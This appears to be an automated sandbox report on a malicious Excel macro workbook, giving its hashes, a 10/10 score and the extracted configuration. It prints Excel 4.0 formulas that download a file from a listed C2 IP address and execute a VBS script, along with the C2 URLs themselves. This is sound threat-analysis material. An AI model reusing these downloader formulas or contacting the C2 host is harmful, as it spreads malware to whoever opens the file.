General

  • Target

    821bf4028c0e7e17d232bbcce960f776

  • Size

    6KB

  • MD5

    821bf4028c0e7e17d232bbcce960f776

  • SHA1

    12e7074042d355bda8f4c1e9c9cd8d7ed3dd97df

  • SHA256

    c8395e8c9eefaf6fa50b8d65e3cad4fc9b4cdf156354bdbb03d8f1160ccc8405

  • SHA512

    23870e9a1cae0408ca8bd3ff10f3bd2b1603833fc100706e447b296f86b08958b3584aa94cbf3b2f6f1f5e0c2f425b1ef7883187fbb2107fb61d28a416fef5e8

  • SSDEEP

    192:NDShuSrbrA2OmmfRC8UhHFBFYuMb98yuNmYuPn8k+s0QUl+B:NWuwM2wA1FYxb98yuNmYuPn8O0QUl+B

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Signatures

Files

  • 821bf4028c0e7e17d232bbcce960f776
    .xlsm office2007